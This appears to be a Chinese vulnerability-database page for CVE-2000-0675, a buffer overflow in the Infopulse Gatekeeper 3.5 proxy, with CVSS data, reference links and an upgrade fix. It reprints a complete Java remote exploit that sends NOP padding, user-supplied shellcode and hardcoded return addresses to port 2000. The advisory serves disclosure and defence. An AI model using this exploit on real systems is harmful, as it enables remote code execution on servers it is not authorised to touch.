CVE-2000-0675
CVSS7.5
发布时间 :2000-07-13 00:00:00
修订时间 :2008-09-05 16:21:36
NMCOE    

[原文]Buffer overflow in Infopulse Gatekeeper 3.5 and earlier allows remote attackers to execute arbitrary commands via a long string.


[CNNVD]Infopulse Gatekeeper缓冲区溢出漏洞 (CNNVD-200007-035)

        Infopulse Gatekeeper 3.5版本及之前版本存在缓冲区溢出漏洞。远程攻击者可以借助超长字符串来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0675
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0675
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-035
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4948.php
(VENDOR_ADVISORY)  XF  gatekeeper-long-string-bo
http://www.securityfocus.com/bid/1477
(VENDOR_ADVISORY)  BID  1477
http://www.securityfocus.com/templates/archive.pike?list=1&msg=00af01bfece2$a52cbd80$367e1ec4@kungphusion
(VENDOR_ADVISORY)  BUGTRAQ  20000713 The MDMA Crew's GateKeeper Exploit

- 漏洞信息

Infopulse Gatekeeper缓冲区溢出漏洞
高危 缓冲区溢出
2000-07-13 00:00:00 2005-05-02 00:00:00
远程  
        Infopulse Gatekeeper 3.5版本及之前版本存在缓冲区溢出漏洞。远程攻击者可以借助超长字符串来执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20074)

Infopulse GateKeeper 3.5 Buffer Overflow Vulnerability (EDBID:20074)
windows remote
2000-07-13 Verified
0 Wizdumb
N/A [点击下载]
source: http://www.securityfocus.com/bid/1477/info

Infopulse GateKeeper proxy server will crash if a string containing over 4096 characters is entered through port 2000. Arbitrary code execution is possible. Restarting the server is required in order to regain normal functionality.

/* gkwarez.java by Andrew Lewis aka. Wizdumb
 * <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC>
 *
 * Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
 * Written as proof of concept code only - the MDMA crew do not condone
 * illegal activities in any way what-so-ever.
 *
 * This code is now public - Gatekeeper version 3.6 is out. :-)
 *
 * Shellcode is handled plug and play style for flexibility and defence
 * against script kiddies. :) Oh, and coz I'm too dumb to make some and too
 * lazy to find some. :P Also note that nulls in your shellcode are fine for
 * this daemon - just beware of terminating newlines.
 *
 * Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
 */

import java.io.*;
import java.net.*;

class gkwarez {

public static void main(String[] args) throws IOException {

  if (args.length != 3) {
    System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n");
    System.out.println("Shellcode file is code you want to execute on the host");
    System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)");
    System.exit(1); }

  int c;
  Socket soq = null;
  char[] wet = null;
  PrintWriter white = null;
  BufferedReader hellkode = null;
  
  char nop  = 0x90;
  char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 };
  
  // Static addys for "call eax" (backwards) - any1 know of more? mail me. :)
  char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F };
  char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF };
  char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 };
  char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 };
  
  try {
    switch (Integer.parseInt(args[2])) {
      case 95:
        wet = retwin95;
        break;
      case 98:
        wet = retwin98;
        break;
      case 3:
        wet = retntsp3;
        break;
      case 4:
        wet = retntsp4;
        break;
      default:
        System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
        System.exit(1);
        break; } } catch (Exception e) {
          System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
          System.exit(1); }
  
  try {
    hellkode = new BufferedReader(new FileReader(args[1]));
  } catch (Exception e) {
    System.out.println("Unable to open file: " + args[1]);
    System.exit(1); }
  
  try {
    soq = new Socket(args[0], 2000);
    white = new PrintWriter(soq.getOutputStream(), true);
  } catch (Exception e) {
    System.out.println("Problems connecting :-/");
    System.exit(1); }
  
  for (int i = 0; i <= 4800; i++) {
    if ((c = hellkode.read()) != -1) {
      white.write(c);
      if (i == 4096) {
        System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out...");
        System.exit(1); } }
    else {
      if (i == 4096) {
        white.print(jmpcode);
        white.print(wet); }
      else white.print(nop); } }
  white.println();
  System.out.println("Payload sent!"); } }		

- 漏洞信息

1466
Infopulse Gatekeeper Long String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-13 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站